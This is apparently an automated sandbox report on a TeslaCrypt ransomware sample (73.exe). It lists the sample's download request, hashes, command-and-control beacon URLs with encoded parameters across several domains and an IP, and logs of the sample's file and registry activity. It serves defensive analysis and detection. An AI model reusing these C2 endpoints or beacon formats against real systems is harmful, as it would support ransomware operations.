89e9a40d5ea6a735e0f4aa0a619459bc

1. alerts:
2.   msg: normal
3.   product: CMS
4.   version: 7.6.3.426975
5.   appliance: SERVER
6.   appliance-id: 00:25:90:XX:XX:XX
7.   alert (id:134, name:malware-object):
8.     product: Web MPS
9.     appliance-id: 0C:C4:7A:XX:XX:XX
10.     severity: majr
11.     version: 7.6.2.426875
12.     sensor: SERVER
13.     explanation:
14.       protocol: tcp
15.       analysis: binary
16.       malware-detected:
17.         malware (name:Trojan.Ransomware.MVX):
18.         malware (name:Trojan.TeslaCrypt):
19.           type: exe
20.           stype: vm-bot-command
21.           sid: 86108811;86108812
22.           downloaded-at: 2015-12-04T11:41:04Z
23.           md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24.           original: 73.exe
25.           http-header: GET /beta/js/73.exe?0 HTTP/1.1
26. User-Agent: Wget/1.17-dirty (mingw32)
27. Accept: */*
28. Accept-Encoding: identity
29. Host: auctorit.com
30. Connection: Keep-Alive
31.  
32. HTTP/1.1 200 OK
33. Date: Fri, 04 Dec 2015 11:40:51 GMT
34. Server: Apache
35. Last-Modified: Fri, 04 Dec 2015 11:22:10 GMT
36. ETag: "59000-52610b7f010f3"
37. Accept-Ranges: bytes
38. Content-Length: 364544
39. Keep-Alive: timeout=5, max=100
40. Connection: Keep-Alive
41. Content-Type: application/x-msdownload
42.           executed-at: 2015-12-04T20:49:23Z
43.           application: Windows Explorer
44.       cnc-services:
45.         cnc-service:
46.           protocol: tcp
47.           port: 80
48.           address: woodenden.com
49.           channel: GET /sysmisc.php?6D7D9F37631FC985823AE3D6A11B76975E1E6FD99B33B6A4E6449FC4ECEFB6389A70B544F14CF9CE8A41530B7494F84E81EA5965CA5805B89C7B5FE49AE87475207AE85070E1FD0627558DFC66524B2E239AD451633393B4E9EE499FC9BF4EB5126B7B70F1511843BBE94A46033DF406CEBB4805C9BB8BB0B2CBE8ED6AAC1232912CAB09525A00F545F1C01DE2D717E08C5205A093837CAFC49F90EC2C1F31664F167C190D2FA58A28E08777AE5FC037398C8B58D38598B0F7FB6179B6D0786DB48131F4BD5E8397B678BBFAA9F2798A20B75270C7A404AB3F1C3923107D9E8736CC0511780137F0821CACEDB81040DD28C799FF5A6D218AA726AF946F02D1E23B9FCAE6A23482B271395A535DAFADCE74FDE55C20A24E3348D0A84984871DEC8C1F04548850EF19C3EB9D643E09CC58931D23D4D7043ED1E0E5F59FA4F086A6869ABC83F805F0257360B1F8886541C7 HTTP/1.1::~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko::~~Host: woodenden.com::~~Connection: Keep-Alive::~~::~~
50.         cnc-service:
51.           protocol: tcp
52.           port: 80
53.           address: 199.16.199.3
54.           channel: GET /misc.php?186DA62846D1FD7D416074C75C7A1C2C9E64DB6CC989D8BC9DF3DC65347E1E610313A77E1347F0BF42734750B920EF8AB676CAF2D9CE88881E95357E9DE3F6D86F2278BCF9EEEBF371BDEC7A2F72B0BCA080F7E8B708721D49EDF5F1830BBF87DD78F5EF07F20C55E8E68258A9E850EA601A831DF04CC01B8AB0B2245C9C56928921D7C6775FCEFB1759AEC10BFCE8258667569EA3F4F04DCAE2516B0900E2C3740422AF6DD581F0D07FD7295CC9D1FB723BF0A110D963882A73BCA90F59ABA71BD84C40D0EB18A5E9685DA857967039161FC96D5EA7235693E8207797DF481C540EC5CDBB3FCE80537B879E565B2B5DC12A5940B3EC6395032A3F02822DA1720404838BC9FCECF92815F83D31AC1B099BB21B8215818571DF0775474018F3A9F63EFB72FCDF5217D1E6D96F06E15D4E672C629E192C07D7C8F9BA6843020F2958FEAED748005792AABDF31037C8C08E HTTP/1.1::~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko::~~Host: irseek.com::~~Connection: Keep-Alive::~~::~~
55.         cnc-service:
56.           protocol: tcp
57.           port: 80
58.           address: irseek.com
59.           channel: GET /misc.php?6D7D9F37631FC985823AE3D6A11B76975E1E6FD99B33B6A4E6449FC4ECEFB6389A70B544F14CF9CE8A41530B7494F84E81EA5965CA5805B89C7B5FE49AE87475207AE85070E1FD0627558DFC66524B2E239AD451633393B4E9EE499FC9BF4EB5126B7B70F1511843BBE94A46033DF406CEBB4805C9BB8BB0B2CBE8ED6AAC1232912CAB09525A00F545F1C01DE2D717E08C5205A093837CAFC49F90EC2C1F31664F167C190D2FA58A28E08777AE5FC037398C8B58D38598B0F7FB6179B6D0786DB48131F4BD5E8397B678BBFAA9F2798A20B75270C7A404AB3F1C3923107D9E8736CC0511780137F0821CACEDB81040DD28C799FF5A6D218AA726AF946F02D1E23B9FCAE6A23482B271395A535DAFADCE74FDE55C20A24E3348D0A84984871DEC09AE11171D2F672F40C560F36F251C4015E5604621CA6367B230F384C0D01624734323BC0C8A112F345735164448A812 HTTP/1.1::~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko::~~Host: irseek.com::~~Connection: Keep-Alive::~~::~~
60.         cnc-service:
61.           protocol: tcp
62.           port: 80
63.           address: woodenden.com
64.           channel: GET /sysmisc.php?186DA62846D1FD7D416074C75C7A1C2C9E64DB6CC989D8BC9DF3DC65347E1E610313A77E1347F0BF42734750B920EF8AB676CAF2D9CE88881E95357E9DE3F6D86F2278BCF9EEEBF371BDEC7A2F72B0BCA080F7E8B708721D49EDF5F1830BBF87DD78F5EF07F20C55E8E68258A9E850EA601A831DF04CC01B8AB0B2245C9C56928921D7C6775FCEFB1759AEC10BFCE8258667569EA3F4F04DCAE2516B0900E2C3740422AF6DD581F0D07FD7295CC9D1FB723BF0A110D963882A73BCA90F59ABA71BD84C40D0EB18A5E9685DA857967039161FC96D5EA7235693E8207797DF481C540EC5CDBB3FCE80537B879E565B2B5DC12A5940B3EC6395032A3F02822DA1720404838BC9FCECF92815F83D31AC1B099BB21B8215818571DF0775474018F3A9528C52B38F260918A3043BBE6A78811A28D74C1407EE7F027502EBD14479D358D4046B9C1FD8982B78055D7999C8B76C HTTP/1.1::~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko::~~Host: woodenden.com::~~Connection: Keep-Alive::~~::~~
65.         cnc-service:
66.           protocol: tcp
67.           port: 80
68.           address: myexternalip.com
69.           channel: GET /raw HTTP/1.1::~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko::~~Host: myexternalip.com::~~::~~
70.         cnc-service:
71.           protocol: tcp
72.           port: 80
73.           address: aprenderabailarsevillanas.com
74.           channel: GET /wp-content/uploads/misc.php?6D7D9F37631FC985823AE3D6A11B76975E1E6FD99B33B6A4E6449FC4ECEFB6389A70B544F14CF9CE8A41530B7494F84E81EA5965CA5805B89C7B5FE49AE87475207AE85070E1FD0627558DFC66524B2E239AD451633393B4E9EE499FC9BF4EB5126B7B70F1511843BBE94A46033DF406CEBB4805C9BB8BB0B2CBE8ED6AAC1232912CAB09525A00F545F1C01DE2D717E08C5205A093837CAFC49F90EC2C1F31664F167C190D2FA58A28E08777AE5FC037398C8B58D38598B0F7FB6179B6D0786DB48131F4BD5E8397B678BBFAA9F2798A20B75270C7A404AB3F1C3923107D9E8736CC0511780137F0821CACEDB81040DD28C799FF5A6D218AA726AF946F02D1E23B9FCAE6A23482B271395A535DAFADCE74FDE55C20A24E3348D0A84984871DEC581871DC2741952E277C0C5C394EA73D62FFDF06CAA95F626F02DD304DE50A8B24A5036A0F943613122485EC8199077B32C438EEC4196B005AED3B2E21F64BA5 HTTP/1.1::~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko::~~Host: aprenderabailarsevillanas.com::~~Connection: Keep-Alive::~~::~~
75.         cnc-service:
76.           protocol: tcp
77.           port: 80
78.           address: 199.16.199.3
79.           channel: GET /misc.php?6D7D9F37631FC985823AE3D6A11B76975E1E6FD99B33B6A4E6449FC4ECEFB6389A70B544F14CF9CE8A41530B7494F84E81EA5965CA5805B89C7B5FE49AE87475207AE85070E1FD0627558DFC66524B2E239AD451633393B4E9EE499FC9BF4EB5126B7B70F1511843BBE94A46033DF406CEBB4805C9BB8BB0B2CBE8ED6AAC1232912CAB09525A00F545F1C01DE2D717E08C5205A093837CAFC49F90EC2C1F31664F167C190D2FA58A28E08777AE5FC037398C8B58D38598B0F7FB6179B6D0786DB48131F4BD5E8397B678BBFAA9F2798A20B75270C7A404AB3F1C3923107D9E8736CC0511780137F0821CACEDB81040DD28C799FF5A6D218AA726AF946F02D1E23B9FCAE6A23482B271395A535DAFADCE74FDE55C20A24E3348D0A84984871DEC09AE11171D2F672F40C560F36F251C4015E5604621CA6367B230F384C0D01624734323BC0C8A112F345735164448A812 HTTP/1.1::~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko::~~Host: irseek.com::~~Connection: Keep-Alive::~~::~~
80.         cnc-service:
81.           protocol: tcp
82.           port: 80
83.           address: djepola.com
84.           channel: GET /misc.php?186DA62846D1FD7D416074C75C7A1C2C9E64DB6CC989D8BC9DF3DC65347E1E610313A77E1347F0BF42734750B920EF8AB676CAF2D9CE88881E95357E9DE3F6D86F2278BCF9EEEBF371BDEC7A2F72B0BCA080F7E8B708721D49EDF5F1830BBF87DD78F5EF07F20C55E8E68258A9E850EA601A831DF04CC01B8AB0B2245C9C56928921D7C6775FCEFB1759AEC10BFCE8258667569EA3F4F04DCAE2516B0900E2C3740422AF6DD581F0D07FD7295CC9D1FB723BF0A110D963882A73BCA90F59ABA71BD84C40D0EB18A5E9685DA857967039161FC96D5EA7235693E8207797DF481C540EC5CDBB3FCE80537B879E565B2B5DC12A5940B3EC6395032A3F02822DA1720404838BC9FCECF92815F83D31AC1B099BB21B8215818571DF0775474018F3A94E701C59E26AE09F9C25C4F5BA58B92BC0B439D0F7FE1305A29727C6F5471D962F04B11DA7BFE934C06A95F08161E52D HTTP/1.1::~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko::~~Host: djepola.com::~~Connection: Keep-Alive::~~::~~
85.         cnc-service:
86.           protocol: tcp
87.           port: 80
88.           address: djepola.com
89.           channel: GET /misc.php?6D7D9F37631FC985823AE3D6A11B76975E1E6FD99B33B6A4E6449FC4ECEFB6389A70B544F14CF9CE8A41530B7494F84E81EA5965CA5805B89C7B5FE49AE87475207AE85070E1FD0627558DFC66524B2E239AD451633393B4E9EE499FC9BF4EB5126B7B70F1511843BBE94A46033DF406CEBB4805C9BB8BB0B2CBE8ED6AAC1232912CAB09525A00F545F1C01DE2D717E08C5205A093837CAFC49F90EC2C1F31664F167C190D2FA58A28E08777AE5FC037398C8B58D38598B0F7FB6179B6D0786DB48131F4BD5E8397B678BBFAA9F2798A20B75270C7A404AB3F1C3923107D9E8736CC0511780137F0821CACEDB81040DD28C799FF5A6D218AA726AF946F02D1E23B9FCAE6A23482B271395A535DAFADCE74FDE55C20A24E3348D0A84984871DECCCDF4ACE08BDF5C7289F82EA3EB2B2634532A4222EE1D3499322BCAEB7C18FDFE52473350D84D471C408DB88DA2A6314 HTTP/1.1::~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko::~~Host: djepola.com::~~Connection: Keep-Alive::~~::~~
90.         cnc-service:
91.           protocol: tcp
92.           port: 80
93.           address: apotheke-stiepel.com
94.           channel: GET /tmp/misc.php?6D7D9F37631FC985823AE3D6A11B76975E1E6FD99B33B6A4E6449FC4ECEFB6389A70B544F14CF9CE8A41530B7494F84E81EA5965CA5805B89C7B5FE49AE87475207AE85070E1FD0627558DFC66524B2E239AD451633393B4E9EE499FC9BF4EB5126B7B70F1511843BBE94A46033DF406CEBB4805C9BB8BB0B2CBE8ED6AAC1232912CAB09525A00F545F1C01DE2D717E08C5205A093837CAFC49F90EC2C1F31664F167C190D2FA58A28E08777AE5FC037398C8B58D38598B0F7FB6179B6D0786DB48131F4BD5E8397B678BBFAA9F2798A20B75270C7A404AB3F1C3923107D9E8736CC0511780137F0821CACEDB81040DD28C799FF5A6D218AA726AF946F02D1E23B9FCAE6A23482B271395A535DAFADCE74FDE55C20A24E3348D0A84984871DECED21659CCF7FD986FA06F839218E7B26671AEA59CDB3DD9E39D2FBB34FC011E1FE479B2804682BF57FEE5D1570CA74FAFCF9F145EF08CF920BFFF611B7A33C72 HTTP/1.1::~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko::~~Host: apotheke-stiepel.com::~~Connection: Keep-Alive::~~::~~
95.         cnc-service:
96.           protocol: tcp
97.           port: 80
98.           address: apotheke-stiepel.com
99.           channel: GET /tmp/misc.php?186DA62846D1FD7D416074C75C7A1C2C9E64DB6CC989D8BC9DF3DC65347E1E610313A77E1347F0BF42734750B920EF8AB676CAF2D9CE88881E95357E9DE3F6D86F2278BCF9EEEBF371BDEC7A2F72B0BCA080F7E8B708721D49EDF5F1830BBF87DD78F5EF07F20C55E8E68258A9E850EA601A831DF04CC01B8AB0B2245C9C56928921D7C6775FCEFB1759AEC10BFCE8258667569EA3F4F04DCAE2516B0900E2C3740422AF6DD581F0D07FD7295CC9D1FB723BF0A110D963882A73BCA90F59ABA71BD84C40D0EB18A5E9685DA857967039161FC96D5EA7235693E8207797DF481C540EC5CDBB3FCE80537B879E565B2B5DC12A5940B3EC6395032A3F02822DA1720404838BC9FCECF92815F83D31AC1B099BB21B8215818571DF0775474018F3A982909206FBB4E8B8DEE345079095D6FACB7D276F50256ABE4A878A2BE0B4BE80AB1296199D73873F2F3AB9240C58A0E884D7CBF6FEDF363779116AE3704406F5 HTTP/1.1::~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko::~~Host: apotheke-stiepel.com::~~Connection: Keep-Alive::~~::~~
100.         cnc-service:
101.           protocol: tcp
102.           port: 80
103.           address: aprenderabailarsevillanas.com
104.           channel: GET /wp-content/uploads/misc.php?186DA62846D1FD7D416074C75C7A1C2C9E64DB6CC989D8BC9DF3DC65347E1E610313A77E1347F0BF42734750B920EF8AB676CAF2D9CE88881E95357E9DE3F6D86F2278BCF9EEEBF371BDEC7A2F72B0BCA080F7E8B708721D49EDF5F1830BBF87DD78F5EF07F20C55E8E68258A9E850EA601A831DF04CC01B8AB0B2245C9C56928921D7C6775FCEFB1759AEC10BFCE8258667569EA3F4F04DCAE2516B0900E2C3740422AF6DD581F0D07FD7295CC9D1FB723BF0A110D963882A73BCA90F59ABA71BD84C40D0EB18A5E9685DA857967039161FC96D5EA7235693E8207797DF481C540EC5CDBB3FCE80537B879E565B2B5DC12A5940B3EC6395032A3F02822DA1720404838BC9FCECF92815F83D31AC1B099BB21B8215818571DF0775474018F3A9BE2ABD2CB94BBE711C82A3574DD576B5CF604106D55E6F2BFE1D5A4A8056AE25C6ACCEE5C75320955910B98551B937D3BEE23BB4859D46B0B74354C1D39161C4 HTTP/1.1::~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko::~~Host: aprenderabailarsevillanas.com::~~Connection: Keep-Alive::~~::~~
105.         cnc-service:
106.           protocol: tcp
107.           port: 80
108.           address: irseek.com
109.           channel: GET /misc.php?186DA62846D1FD7D416074C75C7A1C2C9E64DB6CC989D8BC9DF3DC65347E1E610313A77E1347F0BF42734750B920EF8AB676CAF2D9CE88881E95357E9DE3F6D86F2278BCF9EEEBF371BDEC7A2F72B0BCA080F7E8B708721D49EDF5F1830BBF87DD78F5EF07F20C55E8E68258A9E850EA601A831DF04CC01B8AB0B2245C9C56928921D7C6775FCEFB1759AEC10BFCE8258667569EA3F4F04DCAE2516B0900E2C3740422AF6DD581F0D07FD7295CC9D1FB723BF0A110D963882A73BCA90F59ABA71BD84C40D0EB18A5E9685DA857967039161FC96D5EA7235693E8207797DF481C540EC5CDBB3FCE80537B879E565B2B5DC12A5940B3EC6395032A3F02822DA1720404838BC9FCECF92815F83D31AC1B099BB21B8215818571DF0775474018F3A9F63EFB72FCDF5217D1E6D96F06E15D4E672C629E192C07D7C8F9BA6843020F2958FEAED748005792AABDF31037C8C08E HTTP/1.1::~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko::~~Host: irseek.com::~~Connection: Keep-Alive::~~::~~
110.       os-changes (id:97480):
111.         osinfo: Microsoft Windows7 64-bit 6.1 sp1 15.0826
112.         version:  1.1290
113.         analysis:
114.           sequenceNumber: 1
115.           product: MPS
116.           ftype: exe
117.           mode: malware
118.           version:  1.1290
119.         application:
120.           app-name: Windows Explorer
121.           sequenceNumber: 2
122.         os (name:windows):
123.           version: 6.1.7601
124.           arch: x64
125.           sequenceNumber: 3
126.           sp: 1
127.         os_monitor:
128.           date: Aug 13 2015
129.           version: 15R1
130.           build: 403692
131.           sequenceNumber: 4
132.           time: 17:02:35
133.         config-update:
134.           timestamp: 78
135.           sequenceNumber: 5
136.           status: success
137.           update-requested: false
138.           version: 1.01
139.         uac:
140.           timestamp: 7079
141.           mode: service
142.           sequenceNumber: 6
143.           value: Multimedia Class Scheduler
144.           status: running
145.         process:
146.           timestamp: 18878
147.           mode: started
148.           sequenceNumber: 7
149.           value: C:\Users\Administrator\AppData\Local\Temp\73.exe
150.           pid: 2312
151.           ppid: 1092
152.           parentname: C:\Windows\explorer.exe
153.           cmdline: "C:\Users\Administrator\AppData\Local\Temp\73.exe"
154.           filesize: 364544
155.           md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
156.           sha1sum: 8d149bc90e10db7571379dc0e62409cdcfb7427c
157.             ads:
158.           fid (ads:): 3377699720611042
159.         file:
160.           timestamp: 20909
161.           mode: failed
162.           sequenceNumber: 8
163.           value: C:\Windows\System32\WOW64LOG.DLL
164.           processinfo:
165.             tainted: true
166.             pid: 2312
167.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
168.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
169.             ads:
170.           fid (ads:): 0
171.           failure: open
172.           ntstatus: 0xc0000034
173.           CreateOptions: 0x200000
174.           PE:
175.             InspectionType: Ext
176.         new-dialog-popup:
177.           timestamp: 21972
178.           sequenceNumber: 9
179.           processinfo:
180.             pid: 2312
181.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
182.           hwnd: 0x000D02A0
183.           title: C:\Users\Administrator\AppData\Local\Temp\73.exe
184.           window-class: ConsoleWindowClass
185.           size-width: 677
186.           size-height: 342
187.           position-x: 75
188.           position-y: 75
189.           visible: true
190.           topmost: false
191.           text-fields:
192.             text-field (id:1): C:\Users\Administrator\AppData\Local\Temp\73.exe
193.         regkey:
194.           randomized: true
195.           mode: queryvalue
196.           sequenceNumber: 10
197.           timestamp: 22106
198.           value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
199.          processinfo:
200.            pid: 2312
201.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
202.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
203.        file:
204.          timestamp: 23621
205.          mode: failed
206.          sequenceNumber: 11
207.          value: C:\Windows\ARU2YO48QPE
208.          processinfo:
209.            pid: 2312
210.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
211.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
212.            ads:
213.          fid (ads:): 0
214.          failure: open
215.          ntstatus: 0xc0000034
216.          CreateOptions: 0x60
217.        file:
218.          timestamp: 25213
219.          mode: failed
220.          sequenceNumber: 12
221.          value: C:\Windows\Fonts\FQ2SZNG21IEC5G4
222.          processinfo:
223.            pid: 2312
224.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
225.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
226.            ads:
227.          fid (ads:): 0
228.          failure: open
229.          ntstatus: 0xc0000034
230.          CreateOptions: 0x200000
231.        file:
232.          timestamp: 25309
233.          mode: failed
234.          sequenceNumber: 13
235.          value: C:\Users\Administrator\AppData\Local\Temp\FQ2SZNG21IEC5G4
236.          processinfo:
237.            pid: 2312
238.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
239.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
240.            ads:
241.          fid (ads:): 0
242.          failure: open
243.          ntstatus: 0xc0000034
244.          CreateOptions: 0x200000
245.        file:
246.          timestamp: 25313
247.          mode: failed
248.          sequenceNumber: 14
249.          value: C:\Users\ADMINI~1\AppData\Local\Temp\FQ2SznG21IEC5G4
250.          processinfo:
251.            pid: 2312
252.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
253.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
254.            ads:
255.          fid (ads:): 0
256.          failure: open
257.          ntstatus: 0xc0000034
258.          CreateOptions: 0x200000
259.        file:
260.          timestamp: 25357
261.          mode: failed
262.          sequenceNumber: 15
263.          value: C:\Windows\SysWOW64\FQ2SZNG21IEC5G4
264.          processinfo:
265.            pid: 2312
266.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
267.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
268.            ads:
269.          fid (ads:): 0
270.          failure: open
271.          ntstatus: 0xc0000034
272.          CreateOptions: 0x200000
273.        file:
274.          timestamp: 25361
275.          mode: failed
276.          sequenceNumber: 16
277.          value: C:\Windows\system\FQ2SZNG21IEC5G4
278.          processinfo:
279.            pid: 2312
280.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
281.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
282.            ads:
283.          fid (ads:): 0
284.          failure: open
285.          ntstatus: 0xc0000034
286.          CreateOptions: 0x200000
287.        file:
288.          timestamp: 25364
289.          mode: failed
290.          sequenceNumber: 17
291.          value: C:\Windows\FQ2SZNG21IEC5G4
292.          processinfo:
293.            pid: 2312
294.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
295.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
296.            ads:
297.          fid (ads:): 0
298.          failure: open
299.          ntstatus: 0xc0000034
300.          CreateOptions: 0x200000
301.        file:
302.          timestamp: 25372
303.          mode: failed
304.          sequenceNumber: 18
305.          value: C:\Windows\SysWOW64\wbem\FQ2SZNG21IEC5G4
306.          processinfo:
307.            pid: 2312
308.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
309.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
310.            ads:
311.          fid (ads:): 0
312.          failure: open
313.          ntstatus: 0xc0000034
314.          CreateOptions: 0x200000
315.        file:
316.          timestamp: 25375
317.          mode: failed
318.          sequenceNumber: 19
319.          value: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FQ2SZNG21IEC5G4
320.          processinfo:
321.            pid: 2312
322.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
323.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
324.            ads:
325.          fid (ads:): 0
326.          failure: open
327.          ntstatus: 0xc0000034
328.          CreateOptions: 0x200000
329.        file:
330.          timestamp: 25389
331.          mode: failed
332.          sequenceNumber: 20
333.          value: C:\Program Files (x86)\QuickTime\QTSystem\FQ2SZNG21IEC5G4
334.          processinfo:
335.            pid: 2312
336.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
337.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
338.            ads:
339.          fid (ads:): 0
340.          failure: open
341.          ntstatus: 0xc0000034
342.          CreateOptions: 0x200000
343.        file:
344.          timestamp: 25409
345.          mode: failed
346.          sequenceNumber: 21
347.          value: C:\Program Files (x86)\Debugging Tools for Windows (x86)\FQ2SZNG21IEC5G4
348.          processinfo:
349.            pid: 2312
350.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
351.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
352.            ads:
353.          fid (ads:): 0
354.          failure: open
355.          ntstatus: 0xc0000034
356.          CreateOptions: 0x200000
357.        file:
358.          timestamp: 25413
359.          mode: failed
360.          sequenceNumber: 22
361.          value: C:\Program Files\Debugging Tools for Windows (x64)\FQ2SZNG21IEC5G4
362.          processinfo:
363.            pid: 2312
364.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
365.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
366.            ads:
367.          fid (ads:): 0
368.          failure: open
369.          ntstatus: 0xc0000034
370.          CreateOptions: 0x200000
371.        file:
372.          timestamp: 27963
373.          mode: failed
374.          sequenceNumber: 23
375.          value: C:\Windows\Fonts\R38QI00A0M0\D77273J5H4B
376.          processinfo:
377.            pid: 2312
378.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
379.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
380.            ads:
381.          fid (ads:): 0
382.          failure: open
383.          ntstatus: 0xc000003a
384.          CreateOptions: 0x200000
385.        file:
386.          timestamp: 27968
387.          mode: failed
388.          sequenceNumber: 24
389.          value: C:\Users\Administrator\AppData\Local\Temp\R38QI00A0M0\D77273J5H4B
390.          processinfo:
391.            pid: 2312
392.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
393.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
394.            ads:
395.          fid (ads:): 0
396.          failure: open
397.          ntstatus: 0xc000003a
398.          CreateOptions: 0x200000
399.        file:
400.          timestamp: 27974
401.          mode: failed
402.          sequenceNumber: 25
403.          value: C:\Users\ADMINI~1\AppData\Local\Temp\R38QI00a0m0\D77273j5H4b
404.          processinfo:
405.            pid: 2312
406.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
407.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
408.            ads:
409.          fid (ads:): 0
410.          failure: open
411.          ntstatus: 0xc000003a
412.          CreateOptions: 0x200000
413.        file:
414.          timestamp: 27982
415.          mode: failed
416.          sequenceNumber: 26
417.          value: C:\Windows\SysWOW64\R38QI00A0M0\D77273J5H4B
418.          processinfo:
419.            pid: 2312
420.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
421.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
422.            ads:
423.          fid (ads:): 0
424.          failure: open
425.          ntstatus: 0xc000003a
426.          CreateOptions: 0x200000
427.        file:
428.          timestamp: 27996
429.          mode: failed
430.          sequenceNumber: 27
431.          value: C:\Windows\system\R38QI00A0M0\D77273J5H4B
432.          processinfo:
433.            pid: 2312
434.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
435.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
436.            ads:
437.          fid (ads:): 0
438.          failure: open
439.          ntstatus: 0xc000003a
440.          CreateOptions: 0x200000
441.        file:
442.          timestamp: 28000
443.          mode: failed
444.          sequenceNumber: 28
445.          value: C:\Windows\R38QI00A0M0\D77273J5H4B
446.          processinfo:
447.            pid: 2312
448.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
449.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
450.            ads:
451.          fid (ads:): 0
452.          failure: open
453.          ntstatus: 0xc000003a
454.          CreateOptions: 0x200000
455.        file:
456.          timestamp: 28036
457.          mode: failed
458.          sequenceNumber: 29
459.          value: C:\Windows\SysWOW64\wbem\R38QI00A0M0\D77273J5H4B
460.          processinfo:
461.            pid: 2312
462.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
463.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
464.            ads:
465.          fid (ads:): 0
466.          failure: open
467.          ntstatus: 0xc000003a
468.          CreateOptions: 0x200000
469.        file:
470.          timestamp: 28041
471.          mode: failed
472.          sequenceNumber: 30
473.          value: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\R38QI00A0M0\D77273J5H4B
474.          processinfo:
475.            pid: 2312
476.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
477.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
478.            ads:
479.          fid (ads:): 0
480.          failure: open
481.          ntstatus: 0xc000003a
482.          CreateOptions: 0x200000
483.        file:
484.          timestamp: 28045
485.          mode: failed
486.          sequenceNumber: 31
487.          value: C:\Program Files (x86)\QuickTime\QTSystem\R38QI00A0M0\D77273J5H4B
488.          processinfo:
489.            pid: 2312
490.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
491.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
492.            ads:
493.          fid (ads:): 0
494.          failure: open
495.          ntstatus: 0xc000003a
496.          CreateOptions: 0x200000
497.        file:
498.          timestamp: 28049
499.          mode: failed
500.          sequenceNumber: 32
501.          value: C:\Program Files (x86)\Debugging Tools for Windows (x86)\R38QI00A0M0\D77273J5H4B
502.          processinfo:
503.            pid: 2312
504.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
505.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
506.            ads:
507.          fid (ads:): 0
508.          failure: open
509.          ntstatus: 0xc000003a
510.          CreateOptions: 0x200000
511.        file:
512.          timestamp: 28096
513.          mode: failed
514.          sequenceNumber: 33
515.          value: C:\Program Files\Debugging Tools for Windows (x64)\R38QI00A0M0\D77273J5H4B
516.          processinfo:
517.            pid: 2312
518.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
519.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
520.            ads:
